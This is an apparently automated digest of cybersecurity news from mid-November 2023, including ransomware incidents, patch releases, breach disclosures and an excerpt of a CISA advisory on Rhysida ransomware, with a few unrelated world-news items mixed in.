            A new software-based fault injection attack, CacheWarp, can let threat actors hack into AMD SEV-protected virtual machines by targeting memory writes to escalate privileges and gain remote code execution. [...]


            LockBit ransomware exploits Citrix Bleed in attacks, 10K servers exposed

            exploits ransomware
            2023-11-14 https://www.bleepingcomputer.com/news/security/lockbit-ransomware-exploits-citrix-bleed-in-attacks-10k-servers-exposed/
            The LockBit ransomware attacks use publicly available exploits for the Citrix Bleed vulnerability (CVE-2023-4966) to breach the systems of large organizations, steal data, and encrypt files. [...]

            Autosummary: The majority of the servers, 3,133, are in the U.S., followed by 1,228 in Germany, 733 in China, 558 in the U.K., 381 in Australia, 309 in Canada, 301 in France, 277 in Italy, 252 in Spain, 244 in the Netherlands, and 215 in Switzerland.


            Microsoft November 2023 Patch Tuesday fixes 5 zero-days, 58 flaws

            exploits
            2023-11-14 https://www.bleepingcomputer.com/news/microsoft/microsoft-november-2023-patch-tuesday-fixes-5-zero-days-58-flaws/
            Today is Microsoft's November 2023 Patch Tuesday, which includes security updates for a total of 58 flaws and five zero-day vulnerabilities. [...]

            Autosummary: The number of bugs in each vulnerability category is as follows: 16 Elevation of Privilege Vulnerabilities; 6 Security Feature Bypass Vulnerabilities; 15 Remote Code Execution Vulnerabilities; 6 Information Disclosure Vulnerabilities; 5 Denial of Service Vulnerabilities; 11 Spoofing Vulnerabilities. The total count of 58 flaws does not include 5 Mariner security updates and 20 Microsoft Edge security updates released earlier this month.


            Pharmacy provider Truepill data breach hits 2.3 million customers

            financial
            2023-11-14 https://www.bleepingcomputer.com/news/security/pharmacy-provider-truepill-data-breach-hits-23-million-customers/
            Postmeds, doing business as "Truepill," is sending notifications of a data breach informing recipients that threat actors accessed their sensitive personal information. [...]


            Danish energy sector hit by a wave of coordinated cyberattacks

            industry ciber
            2023-11-14 https://www.helpnetsecurity.com/2023/11/14/danish-energy-sector-cyberattack/

            The Danish energy sector has suffered what is believed to be the most extensive cyberattack in Danish history, according to SektorCERT. Danish energy sector under attack: SektorCERT, an organization owned and funded by Danish critical infrastructure (CI) companies, uses a network of 270 sensors implemented across the country and these organizations to monitor internet traffic and detect possible cyberattacks. From this vantage point, in May 2023, they detected three waves of attacks targeting companies in …


            CacheWarp Attack: New Vulnerability in AMD SEV Exposes Encrypted VMs

            exploits
            2023-11-14 https://thehackernews.com/2023/11/cachewarp-attack-new-vulnerability-in.html
            A group of academics has disclosed a new "software fault attack" on AMD's Secure Encrypted Virtualization (SEV) technology that could be potentially exploited by threat actors to infiltrate encrypted virtual machines (VMs) and even perform privilege escalation. The attack has been codenamed CacheWarp (CVE-2023-20592) by researchers from the CISPA Helmholtz Center for Information Security. It

            Autosummary: SEV-SNP, which incorporates Secure Nested Paging (SNP), adds "strong memory integrity protection to help prevent malicious hypervisor-based attacks like data replay, memory re-mapping, and more in order to create an isolated execution environment," according to AMD.


            WP Fastest Cache plugin bug exposes 600K WordPress sites to attacks

            exploits
            2023-11-14 https://www.bleepingcomputer.com/news/security/wp-fastest-cache-plugin-bug-exposes-600k-wordpress-sites-to-attacks/
            The WordPress plugin WP Fastest Cache has an SQL injection vulnerability that could allow unauthenticated attackers to read the contents of the site's database. [...]


            Microsoft Patch Tuesday security updates fixed 3 actively exploited flaws

            exploits
            2023-11-14 https://securityaffairs.com/154175/security/microsoft-patch-tuesday-security-updates-nov-2023.html

            Patch Tuesday security updates for November 2023 fixed three vulnerabilities actively exploited in the wild. Microsoft Patch Tuesday security updates for November 2023 addressed 63 new vulnerabilities in Microsoft Windows and Windows Components; Exchange Server; Office and Office Components; ASP.NET and .NET Framework; Azure; Mariner; Microsoft Edge (Chromium-based), Visual Studio, and Windows Hyper-V. Three vulnerabilities […]

            Autosummary: Three vulnerabilities addressed by the IT giant are rated Critical, 56 are rated Important, and four are rated Moderate in severity.


            Number of Venezuelan migrants at US-Mexico border halves

            latam
            2023-11-14 https://www.bbc.co.uk/news/world-us-canada-67422122?at_medium=RSS&at_campaign=KARANGA
            The US government restarted regular deportation flights to Venezuela last month. "



            Dani Alves: Former Brazil and Barcelona defender to stand trial for alleged sexual assault

            latam
            2023-11-14 https://www.bbc.co.uk/sport/football/67417736?at_medium=RSS&at_campaign=KARANGA
            Ex-Brazil and Barcelona defender Dani Alves is to stand trial in Spain for alleged sexual assault. "



            #StopRansomware: Rhysida Ransomware

            exploits ransomware
            2023-11-14 https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-319a

            SUMMARY

            Note: This joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders detailing various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.

            The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and the Multi-State Information Sharing and Analysis Center (MS-ISAC) are releasing this joint CSA to disseminate known Rhysida ransomware IOCs and TTPs identified through investigations as recently as September 2023. Rhysida—an emerging ransomware variant—has predominately been deployed against the education, healthcare, manufacturing, information technology, and government sectors since May 2023. The information in this CSA is derived from related incident response investigations and malware analysis of samples discovered on victim networks.

            FBI, CISA, and the MS-ISAC encourage organizations to implement the recommendations in the Mitigations section of this CSA to reduce the likelihood and impact of Rhysida ransomware and other ransomware incidents.

            Download the PDF version of this report:

            For a downloadable copy of IOCs, see:

            Autosummary: Overview: Threat actors leveraging Rhysida ransomware are known to impact “targets of opportunity,” including victims in the education, healthcare, manufacturing, information technology, and government sectors. Additionally, open source reporting[2] has confirmed observed instances of Rhysida actors operating in a ransomware-as-a-service (RaaS) capacity, where ransomware tools and infrastructure are leased out in a profit-sharing model. Rhysida ransomware uses a Windows 64-bit Portable Executable (PE) or common object file format (COFF) compiled using MinGW via the GNU Compiler Collection (GCC), which supports various programming languages such as C, C++, and Go.

            Technical Details. Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 14. Living off the Land: Analysis identified Rhysida actors using living off the land techniques, such as creating Remote Desktop Protocol (RDP) connections for lateral movement [T1021.001], establishing VPN access, and utilizing PowerShell [T1059.001]. Permission Groups Discovery [T1069.001, T1069.002]: net localgroup administrators [T1069.001]. Analysis of the master file table (MFT)[4] identified the victim system generated the ntuser.dat registry hive, which was created when the compromised user logged in to the system for the first time. Note: Microsoft released a patch for CVE-2020-1472 on August 11, 2020.[3]

            Table 10: Defense Evasion
            Technique Title: Indicator Removal: Clear Windows Event Logs
            ID: T1070.001
            Use: Rhysida actors used wevtutil.exe to clear Windows event logs, including system, application, and security logs.

            Mitigations: In addition, FBI, CISA, and the MS-ISAC recommend network defenders apply the following mitigations to limit potential adversarial use of common system and network discovery techniques, and to reduce the impact and risk of compromise by ransomware or data extortion actors: Keep all operating systems, software, and firmware up to date. Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, and secure location (e.g., hard drive, storage device, or the cloud).

            Validate Security Controls: In addition to applying mitigations, FBI, CISA, and the MS-ISAC recommend exercising, testing, and validating your organization's security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. FBI, CISA, and the MS-ISAC recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.

            Resources and Reporting: FBI is seeking any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with Rhysida actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file. Additional details requested include: a targeted company point of contact, status and scope of infection, estimated loss, operational impact, transaction IDs, date of infection, date detected, initial attack vector, and host and network-based indicators.

            Disclaimer: Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by FBI, CISA, and the MS-ISAC. FBI, CISA, and the MS-ISAC do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. "


            Level up! These games will make learning about cybersecurity fun

            ciber
            2023-11-14 https://www.welivesecurity.com/en/we-live-progress/level-up-games-make-learning-cybersecurity-fun/
            Discover six games that will provide valuable knowledge while turning learning about digital security into an enjoyable and rewarding adventure "

            Autosummary: The experience is divided into four adventures that introduce fundamental cybersecurity concepts in a simple and intuitive manner. Google Interland: Its primary goal is to empower participants, especially young ones, to avoid online traps, recognize safe behavior on social media platforms, manage passwords effectively, recognize bullies and predators, and understand responsible data sharing. OverTheWire: Popular games include Bandit, Narnia, and Natas, each focusing on specific aspects of cybersecurity, such as vulnerability scanning, network traffic analysis, and password cracking. "


            Kubernetes adoption creates new cybersecurity challenges

            ciber
            2023-11-13 https://www.helpnetsecurity.com/2023/11/13/cloud-native-environments-risks/

            To maintain a competitive edge, modern organizations are evolving toward highly scalable, flexible and resilient applications – leading to the widespread adoption of cloud native technologies like Kubernetes, according to Venafi. Security challenges in cloud native environments: In fact, 84% of security and IT leaders believe that Kubernetes will soon be the main platform used to develop all applications. However, amid the rush to transition to these modern environments, many development teams are putting security … More

            The post Kubernetes adoption creates new cybersecurity challenges appeared first on Help Net Security.

            "

            Autosummary: However, the actual implementation of security tools, governance, and policies is split among development, security, and platform teams, with a slight majority going to the development teams (41%). "


            Cyber risk is business risk: Qualys Enterprise TruRisk Platform sets new industry standard

            industry
            2023-11-13 https://www.helpnetsecurity.com/2023/11/13/sumedh-thakar-qualys-trurisk-platform/

            In this Help Net Security interview, Sumedh Thakar, President and CEO of Qualys, explores the vision behind the Qualys Enterprise TruRisk Platform, a strategic move aimed at redefining how enterprises measure, communicate, and eliminate cyber risk. We delve into how Qualys assists CISOs in the complex balancing act of managing critical issues under budget constraints, the financial implications of cyber risk, and the advanced capabilities of the TruRisk Platform in providing a unified view of … More

            The post Cyber risk is business risk: Qualys Enterprise TruRisk Platform sets new industry standard appeared first on Help Net Security.

            "

            Autosummary: However, as cyber risk has become a dominant contributor to any organization's overall risk posture, de-risking a business from cyber risk has become a central focus of executive stakeholders, from the CEO to the board of directors. Today, nearly every business is a software business, relying on software to run core operations, which makes them susceptible to elevated cyber risk and breaches. "


            Success eludes the International Counter Ransomware Initiative

            exploits ransomware
            2023-11-13 https://www.helpnetsecurity.com/2023/11/13/international-counter-ransomware-initiative-cri/

            A swing and a miss by the 50 member countries of the International Counter Ransomware Initiative (CRI), headlined by the US, who have confirmed a commitment to collectively address ransomware. Ransomware, as predicted, is growing at tremendous rates and focusing on critical infrastructure sectors that can impact vast numbers of citizens. It is such a blight that countries are banding together to see what can be done. Everybody is looking towards the United States for … More

            The post Success eludes the International Counter Ransomware Initiative appeared first on Help Net Security.

            "

            Autosummary: The CRI recognizes that paying attackers only makes them stronger and incentivizes them to attack more, while severing payments, no matter how painful, weakens and greatly discourages attackers, and will ultimately grind their attacks down to insignificance. "


            The real cost of healthcare cybersecurity breaches

            ciber
            2023-11-13 https://www.helpnetsecurity.com/2023/11/13/taylor-lehmann-google-healthcare-cybersecurity-breaches/

            With each step towards digitalization, from cloud computing to electronic records, the healthcare sector faces mounting risks that threaten not just the privacy but the very wellbeing of patients. In this Help Net Security interview, Taylor Lehmann, Director, Office of the CISO, Google Cloud, discusses the critical conversation surrounding the ethical and legal responsibilities that healthcare providers must navigate in the wake of a data breach. He explores the severe implications of cyber threats that … More

            The post The real cost of healthcare cybersecurity breaches appeared first on Help Net Security.

            "

            Autosummary: In June, St. Margaret’s Health, the only hospital in the small, rural community of Spring Valley, Illinois, permanently closed its doors, in part because of the insurmountable costs to restore hospital services following a 2021 ransomware attack. To put an end to the growing, existential threat that healthcare faces, it will take creativity, innovation, partnership, and a willingness to change the current state of IT security and risk management in healthcare. Many new laws and regulations are being proposed to address some of the concerns voiced by the healthcare security community, including those that seek to increase the amount of security threat intelligence that is being shared, drive adoption of new security models like zero trust, improve the security of supply chains for software and data, and others. Lawsuits from breach victims seeking damages for medical identity theft, financial losses, potential loss of life, and emotional distress can also have a substantial legal, financial, and reputational impact. "


            Major Phishing-as-a-Service Syndicate "BulletProofLink" Dismantled by Malaysian Authorities

            financial
            2023-11-13 https://thehackernews.com/2023/11/major-phishing-as-service-syndicate.html
            Malaysian law enforcement authorities have announced the takedown of a phishing-as-a-service (PhaaS) operation called BulletProofLink. The Royal Malaysia Police said the effort, which was carried out with assistance from the Australian Federal Police (AFP) and the U.S. Federal Bureau of Investigation (FBI) on November 6, 2023, was based on information that the threat actors behind the platform "

            Autosummary: To that end, eight individuals aged between 29 and 56, including the syndicate's mastermind, have been arrested across different locations in Sabah, Selangor, Perak, and Kuala Lumpur, New Straits Times reported. "


            New Ransomware Group Emerges with Hive's Source Code and Infrastructure

            exploits ransomware
            2023-11-13 https://thehackernews.com/2023/11/new-ransomware-group-emerges-with-hives.html
            The threat actors behind a new ransomware group called Hunters International have acquired the source code and infrastructure from the now-dismantled Hive operation to kick-start its own efforts in the threat landscape. "It appears that the leadership of the Hive group made the strategic decision to cease their operations and transfer their remaining assets to another group, Hunters "

            Autosummary: "It appears that the leadership of the Hive group made the strategic decision to cease their operations and transfer their remaining assets to another group, Hunters International," Martin Zugec, technical solutions director at Bitdefender, said in a report published last week. "


            Israel warns of BiBi wiper attacks targeting Linux and Windows

            Linux
            2023-11-13 https://www.bleepingcomputer.com/news/security/israel-warns-of-bibi-wiper-attacks-targeting-linux-and-windows/
            Security researchers found a Windows equivalent for the recently discovered BiBi-Linux, a data-wiping malware used in attacks to destroy data on systems at Israeli companies. [...] "

            Autosummary: (Image: BiBi's commands stored in reverse writing order to evade detection; source: BlackBerry.) BiBi for Windows targets all file types except for .EXE, .DLL, and .SYS files, likely because destroying them would render the computer unusable, and the hacktivists wouldn't be able to relay their message. "


            Impinj R720 reader optimizes speed and automation in supply chain and logistics

            industry
            2023-11-13 https://www.helpnetsecurity.com/2023/11/13/impinj-r720-rain-rfid-reader/

            Impinj announced the Impinj R720 RAIN RFID reader. With more processing power and memory than Impinj’s prior-generation reader, the Impinj R720 speeds edge processing and reduces network load and latency, allowing on-reader applications to meet the most demanding requirements of large-scale enterprise deployments. “Enterprises see increasing demand for reliable, real-time data about every item they manufacture, transport and sell,” said Jeff Dossett, Impinj CRO. “The Impinj R720 reader delivers powerful edge processing to support application … More

            The post Impinj R720 reader optimizes speed and automation in supply chain and logistics appeared first on Help Net Security.

            "

            Autosummary: The Impinj R720 reader further advances the proven Impinj platform, an end-to-end RAIN RFID platform with tag chips, reader chips, readers, software, testing solutions, services, and a global partner ecosystem. "


            Network Perception integrates technology with Claroty to boost OT cybersecurity for organizations

            ciber
            2023-11-13 https://www.helpnetsecurity.com/2023/11/13/network-perception-claroty-integration/

            Network Perception announced a technology integration with Claroty to provide OT network auditors with a comprehensive, independent audit platform to track and verify system changes and enhance network visibility. The combined technology enables auditors to establish an accurate baseline view of network architecture and cybersecurity posture. This information can then be used to set up continuous monitoring that enables immediate response and adaptation to disruptions. Network assessment automation is fundamental to cyber resiliency best practices, … More

            The post Network Perception integrates technology with Claroty to boost OT cybersecurity for organizations appeared first on Help Net Security.

            "



            LockBit ransomware gang leaked data stolen from Boeing

            exploits ransomware
            2023-11-13 https://securityaffairs.com/154115/cyber-crime/lockbit-ransomware-leaked-boeing-data.html

            The LockBit ransomware group published data allegedly stolen from the aerospace giant Boeing in a recent attack. The Boeing Company, commonly known as Boeing, is one of the world’s largest aerospace manufacturers and defense contractors. In 2022, Boeing recorded $66.61 billion in sales and had 156,000 employees. At the end of October, the Lockbit ransomware […]

            The post LockBit ransomware gang leaked data stolen from Boeing appeared first on Security Affairs.

            "

            Autosummary: Pierluigi Paganini, November 13, 2023. "


            Colombian rebels try to justify kidnapping of Luis Díaz"s father

            latam
            2023-11-13 https://www.bbc.co.uk/news/world-latin-america-67403958?at_medium=RSS&at_campaign=KARANGA
            Colombians are outraged after the rebels claim they have to resort to kidnapping because they are "poor". "



            FBI: Royal ransomware asked 350 victims to pay $275 million

            exploits ransomware
            2023-11-13 https://www.bleepingcomputer.com/news/security/fbi-royal-ransomware-asked-350-victims-to-pay-275-million/
            The FBI and CISA revealed in a joint advisory that the Royal ransomware gang has breached the networks of at least 350 organizations worldwide since September 2022. [...] "

            Autosummary: During these attacks, when targets dial the phone numbers embedded in emails cleverly disguised as subscription renewals, the attackers leverage social engineering tactics to trick the victims into installing remote access software, granting them access to the targeted network. "


            DP World cyberattack blocks thousands of containers in ports

            ciber
            2023-11-13 https://www.bleepingcomputer.com/news/security/dp-world-cyberattack-blocks-thousands-of-containers-in-ports/
            A cyberattack on international logistics firm DP World Australia has severely disrupted the regular freight movement in multiple large Australian ports. [...] "



            CISA warns of actively exploited Juniper pre-auth RCE exploit chain

            exploits
            2023-11-13 https://www.bleepingcomputer.com/news/security/cisa-warns-of-actively-exploited-juniper-pre-auth-rce-exploit-chain/
            CISA warned federal agencies today to secure Juniper devices on their networks by Friday against four vulnerabilities now used in remote code execution (RCE) attacks as part of a pre-auth exploit chain. [...] "



            CISA adds five vulnerabilities in Juniper devices to its Known Exploited Vulnerabilities catalog

            exploits
            2023-11-13 https://securityaffairs.com/154128/security/cisa-juniper-flaws-known-exploited-vulnerabilities-catalog.html

            US CISA added four vulnerabilities (tracked as CVE-2023-36844, CVE-2023-36845, CVE-2023-36846, and CVE-2023-36847) in Juniper devices to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added six new vulnerabilities to its Known Exploited Vulnerabilities catalog, five issues impacting Juniper Junos OS and one impacting the SysAid IT support software. Below is the list […]

            The post CISA adds five vulnerabilities in Juniper devices to its Known Exploited Vulnerabilities catalog appeared first on Security Affairs.

            "

            Autosummary: Pierluigi Paganini, November 13, 2023. Below is the list of the added vulnerabilities:
            CVE-2023-47246 SysAid Server Path Traversal Vulnerability
            CVE-2023-36844 Juniper Junos OS EX Series PHP External Variable Modification Vulnerability
            CVE-2023-36845 Juniper Junos OS EX Series and SRX Series PHP External Variable Modification Vulnerability
            CVE-2023-36846 Juniper Junos OS SRX Series Missing Authentication for Critical Function Vulnerability
            CVE-2023-36847 Juniper Junos OS EX Series Missing Authentication for Critical Function Vulnerability
            CVE-2023-36851 Juniper Junos OS SRX Series Missing Authentication for Critical Function Vulnerability
            According to Juniper SIRT, the vulnerabilities in J-Web can be combined to allow an attacker to achieve pre-auth remote code execution. Juniper addressed four medium-severity (CVSS 5.3) vulnerabilities (CVE-2023-36844, CVE-2023-36845, CVE-2023-36846, CVE-2023-36847) in mid-August. "


            State of Maine data breach impacts 1.3 million people

            financial government
            2023-11-13 https://www.malwarebytes.com/blog/exploits-and-vulnerabilities/2023/11/state-of-maine-data-breach-impacts-1-3-million-people
            The US State of Maine says it has suffered a data breach impacting around 1.3 million people—more or less the entire population of Maine. "

            Autosummary: From what we can gather, the cybercriminals may have obtained names, Social Security numbers (SSN), dates of birth, driver’s licenses, state identification numbers, and taxpayer identification numbers. "


            Iranian hackers launch malware attacks on Israel’s tech sector

            exploits
            2023-11-12 https://www.bleepingcomputer.com/news/security/iranian-hackers-launch-malware-attacks-on-israels-tech-sector/
            Security researchers have tracked a new campaign from Imperial Kitten targeting transportation, logistics, and technology firms. [...] "

            Autosummary: It is a threat actor linked to the Islamic Revolutionary Guard Corps (IRGC), a branch of the Iranian Armed Forces, and has been active since at least 2017 carrying out cyberattacks against organizations in various sectors, including defense, technology, telecommunications, maritime, energy, and consulting and professional services. "


            The State of Maine disclosed a data breach that impacted 1.3M people

            financial government
            2023-11-12 https://securityaffairs.com/154066/data-breach/state-of-maine-data-breach.html

            The State of Maine disclosed a data breach that impacted about 1.3 million people after an attack hit its MOVEit file transfer installation. The State of Maine was the victim of the large-scale hacking campaign that targeted organizations using the MOVEit file transfer tool. The government organization disclosed a data breach that impacted about 1.3 million individuals. Threat actors […]

            The post The State of Maine disclosed a data breach that impacted 1.3M people appeared first on Security Affairs.

            "

            Autosummary: Below is the list of organizations with the highest number of impacted individuals:
            Maximus: 11 million
            Pôle emploi: 10 million
            Louisiana Office of Motor Vehicles: 6 million
            Colorado Department of Health Care Policy and Financing: 4 million
            Oregon Department of Transportation: 3.5 million
            Teachers Insurance and Annuity Association of America: 2.6 million
            Genworth: 2.5 million
            PH Tech: 1.7 million
            Milliman Solutions: 1.2 million
            Wilton Reassurance Company: 1.2 million
            “U.S.-based organizations account for 83.9 percent of known victims, Germany-based 3.6 percent, Canada-based 2.6 percent, and U.K.-based 2.1 percent.” The data is sourced from state breach notifications, SEC filings, and other public disclosures, as well as the leak site maintained by the Cl0p group, and is current as of August 25, 2023. "


            LockBit ransomware leaks gigabytes of Boeing data

            exploits ransomware
            2023-11-12 https://www.bleepingcomputer.com/news/security/lockbit-ransomware-leaks-gigabytes-of-boeing-data/
            The LockBit ransomware gang published data stolen from Boeing, one of the largest aerospace companies that services commercial airplanes and defense systems. [...] "

            Autosummary: (Image: Boeing page on LockBit data leak site; source: BleepingComputer.) Boeing disappeared from LockBit’s list of victims for a period but was listed again on November 7, when the hackers announced that their warnings had been ignored. "


            The Lorenz ransomware group hit Texas-based Cogdell Memorial Hospital

            exploits ransomware
            2023-11-12 https://securityaffairs.com/154101/data-breach/the-lorenz-ransomware-group-hit-texas-based-cogdell-memorial-hospital.html

            The Lorenz extortion group leaked the data stolen from the Texas-based Cogdell Memorial Hospital. In early November, the Cogdell Memorial Hospital (Scurry County Hospital District) announced it was experiencing a computer network incident that prevented the hospital from accessing some of its systems and severely limited the operability of its phone system. The hospital immediately […]

            The post The Lorenz ransomware group hit Texas-based Cogdell Memorial Hospital appeared first on Security Affairs.

            "

            Autosummary: Pierluigi Paganini, November 12, 2023. It is a 70-bed hospital that provides a wide range of services, including emergency care, inpatient and outpatient surgery, medical imaging, laboratory services, physical therapy, occupational therapy, speech therapy, home health care, and hospice care. The Lorenz extortion group claimed responsibility for the security breach and added the hospital to its Tor leak site. "


            Police seized BulletProftLink phishing-as-a-service (PhaaS) platform

            financial
            2023-11-11 https://securityaffairs.com/154041/cyber-crime/bulletproftlink-phaas-platform-seized.html

            The Royal Malaysian Police announced the seizure of the notorious BulletProftLink phishing-as-a-service (PhaaS) platform. The Royal Malaysian Police announced that it has dismantled the notorious BulletProftLink phishing-as-a-service (PhaaS) platform. A joint international operation conducted by the Malaysian police, the FBI, and the Australian Federal Police took down several domains employed in the cybercriminal operation. “We seized around RM960,000 […]

            The post Police seized BulletProftLink phishing-as-a-service (PhaaS) platform appeared first on Security Affairs.

            "

            Autosummary: Pierluigi Paganini, November 11, 2023. "


            Police takes down BulletProftLink large-scale phishing provider

            financial
            2023-11-11 https://www.bleepingcomputer.com/news/security/police-takes-down-bulletproftlink-large-scale-phishing-provider/
            The notorious BulletProftLink phishing-as-a-service (PhaaS) platform that provided more than 300 phishing templates has been seized, the Royal Malaysian Police announced. [...] "

            Autosummary: PhaaS platforms provide cybercriminals with tools and resources to carry out phishing attacks through “ready-to-use” kits and templates, page hosting, customization options, credential harvesting, and reverse proxying tools. "


            Microsoft fixes Outlook Desktop bug causing slow saving issues

            exploits
            2023-11-11 https://www.bleepingcomputer.com/news/microsoft/microsoft-fixes-outlook-desktop-bug-causing-slow-saving-issues/
            Microsoft has resolved a known issue causing significant delays for Microsoft 365 customers when saving attachments in Outlook Desktop. [...] "

            Autosummary: In February, the company had previously addressed a similar bug affecting Office Suite apps, such as Word, Excel, and PowerPoint. "


            How to withstand the onslaught of cybersecurity threats

            ciber
            2023-11-10 https://www.helpnetsecurity.com/2023/11/10/protecting-it-assets/

            “We brought a shovel to fight an avalanche.” That’s the sentiment shared by many business leaders, especially CISOs, CIOs and IT leaders as they face the current cybersecurity threat landscape. Like an avalanche, it’s constantly shifting and changing, moving quickly and unpredictably. With the prevalence of remote and hybrid work models, leaders are having an even harder time protecting all their IT assets. That’s because – to extend this metaphor – the IT assets that … More

            The post How to withstand the onslaught of cybersecurity threats appeared first on Help Net Security.

            "

            Autosummary: How to identify the right cybersecurity tools for 2023 and beyond: The right cybersecurity platform is scalable, user-friendly, easy to deploy and manage, and highly secure. One of the best, if not only, ways to achieve this is to adopt a dynamic, scalable solution that is fully integrated with your UEM solution and has been built with security in mind from the ground up. Why you should consolidate your cybersecurity platform: Another key cybersecurity trend for 2023 and beyond, according to Gartner, is cybersecurity platform consolidation. "


            Mexico officials find 123 migrants trapped in trailer

            latam
            2023-11-10 https://www.bbc.co.uk/news/world-latin-america-67376145?at_medium=RSS&at_campaign=KARANGA
            Most of those found in central Mexico were from Guatemala, Nicaragua and Honduras. "

            Autosummary: "


            CherryBlos, the malware that steals cryptocurrency via your photos – what you need to know

            exploits
            2023-11-10 https://www.tripwire.com/state-of-security/cherryblos-malware-steals-cryptocurrency-your-photos-what-you-need-know
            "

Autosummary: For instance, owners of cryptocurrency wallets might take screenshots of their wallet’s account recovery phrases, crucial information if you ever lose access to a wallet because, for instance, a password is forgotten. Of course, in future attacks they could always use other disguises to camouflage their intentions, and even if they struggle to get a poisoned app into the Google Play store again, they could use social engineering to trick unwary Android users into downloading it from third-party sites. Well, imagine you have sensitive information, such as details related to your cryptocurrency wallet, in your Android phone’s photo gallery. "


            Chinese multinational bank hit by ransomware

            financial exploits ransomware
            2023-11-10 https://www.helpnetsecurity.com/2023/11/10/china-bank-ransomware/

            The state-owned Industrial and Commercial Bank of China (ICBC), which is one of the largest banks in the world, has been hit by a ransomware attack that led to disrupted trades in the US Treasury market. The attack “On November 8, 2023, U.S. Eastern Time (November 9, 2023, Beijing Time), ICBC Financial Services (FS) experienced a ransomware attack that resulted in disruption to certain FS systems. Immediately upon discovering the incident, ICBC FS disconnected and … More

            The post Chinese multinational bank hit by ransomware appeared first on Help Net Security.

            "

            Autosummary: "


            Industrial and Commercial Bank of China (ICBC) suffered a ransomware attack

            financial exploits ransomware industry
            2023-11-10 https://securityaffairs.com/153986/hacking/icbc-ransomware-attack.html

            The Industrial and Commercial Bank of China (ICBC) suffered a ransomware attack that disrupted trades in the US Treasury market. The Industrial and Commercial Bank of China (ICBC) announced it has contained a ransomware attack that disrupted the U.S. Treasury market and impacted some fixed income and equities transactions “The Securities Industry and Financial Markets […]

            The post Industrial and Commercial Bank of China (ICBC) suffered a ransomware attack appeared first on Security Affairs.

            "

            Autosummary: The Industrial and Commercial Bank of China (ICBC) announced it has contained a ransomware attack that disrupted the U.S. Treasury market and impacted some fixed income and equities transactions “The Securities Industry and Financial Markets Association first told members on Wednesday that ICBC Financial Services had been hit by ransomware software, which paralyses computer systems unless a payment is made, several people familiar with the discussions said.” reported the Financial Times. "


            SysAid zero-day exploited by Clop ransomware group

            exploits ransomware
            2023-11-10 https://securityaffairs.com/153958/hacking/sysaid-zero-day-clop-ransomware-gang.html

            Microsoft spotted the exploitation of a SysAid zero-day vulnerability in limited attacks carried out by the Lace Tempest group. Microsoft reported the exploitation of a zero-day vulnerability, tracked as CVE-2023-47246, in the SysAid IT support software in limited attacks. The IT giant linked the attacks to the Clop ransomware gang (aka Lace Tempest). The company reported the flaw […]

            The post SysAid zero-day exploited by Clop ransomware group appeared first on Security Affairs.

            "

Autosummary: Microsoft spotted the exploitation of a SysAid zero-day vulnerability in limited attacks carried out by the Lace Tempest group. "


            Maine govt notifies 1.3 million people of MOVEit data breach

            financial
            2023-11-10 https://www.bleepingcomputer.com/news/security/maine-govt-notifies-13-million-people-of-moveit-data-breach/
The State of Maine has announced that its systems were breached after threat actors exploited a vulnerability in the MOVEit file transfer tool and accessed personal information of about 1.3 million, which is close to the state’s entire population. [...] "

            Autosummary: "


            McLaren Health Care says data breach impacted 2.2 million people

            financial
            2023-11-10 https://www.bleepingcomputer.com/news/security/mclaren-health-care-says-data-breach-impacted-22-million-people/
            McLaren Health Care (McLaren) is notifying nearly 2.2 million people of a data breach that occurred between late July and August this year, exposing sensitive personal information. [...] "

Autosummary: Evidence shows that on August 31 an unauthorized threat actor had accessed data, and the following data types were confirmed to have been exposed by October 10: full name, Social Security number (SSN), health insurance information, date of birth, billing or claims information, diagnosis, physician information, medical record number, Medicare/Medicaid information, prescription/medication information, and diagnostic results and treatment information. The specific types of data exposed differ for each individual, depending on the information they shared with the organization and the services they received. "


            The Rise of Ransomware in Healthcare: What IT Leaders Need to Know

            exploits ransomware
            2023-11-10 https://www.bleepingcomputer.com/news/security/the-rise-of-ransomware-in-healthcare-what-it-leaders-need-to-know/
            Ransomware attacks are rapidly becoming the weapon of choice, making up over half of all attacks in the healthcare industry. Learn more from Specops Software on securing your organization from these attacks. [...] "

Autosummary: Tools such as Specops Password Policy enable IT teams to set stringent password protocols: meeting compliance standards, setting length and complexity requirements, ensuring the absence of common and weak terms, and blocking known compromised passwords, which significantly tightens access controls. It lays out five core rules – the Privacy Rule, the Security Rule, the Breach Notification Rule, the Enforcement Rule, and the Patient Safety Rule. It spanned a range of sensitive information, including names, addresses, Social Security numbers, and more. "


            YouTube shows ads for ad blocker, financial scams

            financial
            2023-11-10 https://www.malwarebytes.com/blog/uncategorized/2023/11/youtube-shows-ads-for-ad-blocker-financial-scams
YouTube doesn’t want you to run an ad blocker, but it would like you to watch this ad for one. "

            Autosummary: Yet, as of November 9 2023, YouTube was still showing an ad for Total Adblock, a browser extension that blocks… ads. "


            World’s biggest bank hit by ransomware, forced to trade via USB stick

            financial exploits ransomware
            2023-11-10 https://www.bitdefender.com/blog/hotforsecurity/worlds-biggest-bank-hit-by-ransomware-forced-to-trade-via-usb-stick/
            The US trading arm of the Industrial and Commercial Bank of China (ICBC) has been hit by a ransomware attack that reportedly forced it to handle trades via messengers carrying USB thumb drives across Manhattan. Read more in my article on the Hot for Security blog. "

            Autosummary: "


            Russian Hackers Sandworm Cause Power Outage in Ukraine Amidst Missile Strikes

            rusia-ucrania
            2023-11-10 https://thehackernews.com/2023/11/russian-hackers-sandworm-cause-power.html
